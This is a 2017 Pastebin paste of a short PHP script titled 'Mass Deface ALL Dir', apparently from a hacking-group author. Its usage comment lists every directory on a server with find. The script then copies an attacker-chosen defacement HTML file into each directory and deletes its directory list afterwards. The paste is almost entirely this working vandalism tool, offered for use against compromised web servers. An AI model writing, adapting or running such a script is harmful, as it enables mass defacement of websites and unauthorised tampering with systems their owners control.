Advertisement
AZZATSSINS_CYBERSERK

Mass Deface ALL Dir (Just for su)

Jul 4th, 2017
664
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.31 KB | None | 0 0
  1. <?php
  2. /*
  3. AUTHOR : AZZATSSINS
  4. USAGE : find / -type d > azz.txt && php thisfile.php urFileDeface.html
  5. */
  6. echo "\nScanning all dir.....\n";
  7. $anu = explode("\n", file_get_contents('azz.txt'));
  8. foreach($anu as $lol){
  9. copy($argv[1],$lol."/".$argv[1]);
  10. echo "Success > ".$lol."/".$argv[1]."\n";
  11. }
  12. unlink("azz.txt");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement